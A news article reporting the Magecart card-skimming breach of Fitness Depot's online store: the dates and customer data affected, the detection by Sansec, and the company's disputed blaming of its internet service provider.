Fitness Depot revealed that the personal and financial information of customers were stolen following a breach that affected the company’s e-commerce platform last month.
Fitness Depot is the largest specialty exercise equipment retailer in Canada having 40 stores nationwide and two in the United States, Texas, in Dallas and Houston.
The company has sent breach notification letter to all the affected customers and according to the information in it, the attack is believed to be a Magecart attack in which the attackers managed to compromise Fitness Depot’s online store and inject a malicious form designed to collect and exfiltrate customer information.
The main aim of the attackers is to steal all the payment or personal information submitted by the compromised sites’ customers and to direct it to remote servers under their control.
Sansec, a digital skimming detection security firm found the payment card skimmers injected in Fitness Depot’s e-commerce platform between April 2 and May 17.
According to the breach notification the company states that the attackers may have accessed or stolen the information of clients who made purchases for delivery or who made purchases for in-store pick up at one of their retail locations.
The information collected may include the impacted customers’ name, address, email address, telephone number, and credit card number.
The breach which goes as far as February 18, 2020, started with a malicious form injected within the online store.
When the customers where (sic) redirected to this form, their information was copied without the authorization or knowledge of Fitness Depot. This is how the personal information was stolen.
It was found that the customers with home delivery were impacted between February 18 and April 27, while from April 28 and May 22 any customer that ordered product for Home delivery or ordered product for in-store pick-up could have been potentially affected.
On preliminary investigation by the company, it was found that the ISP neglected to activate the anti-virus software on their account and so they blame their internet service provider (ISP) for the data breach.
However, it is not the job of ISP to protect its customers’ e-commerce platforms with anti-malware solutions.
Fitness Depot says that they have no evidence of any of their customer information being compromised in any manner.
The company recommends the customers to be vigilant and check their credit cards and account statements for any transactions not done by them.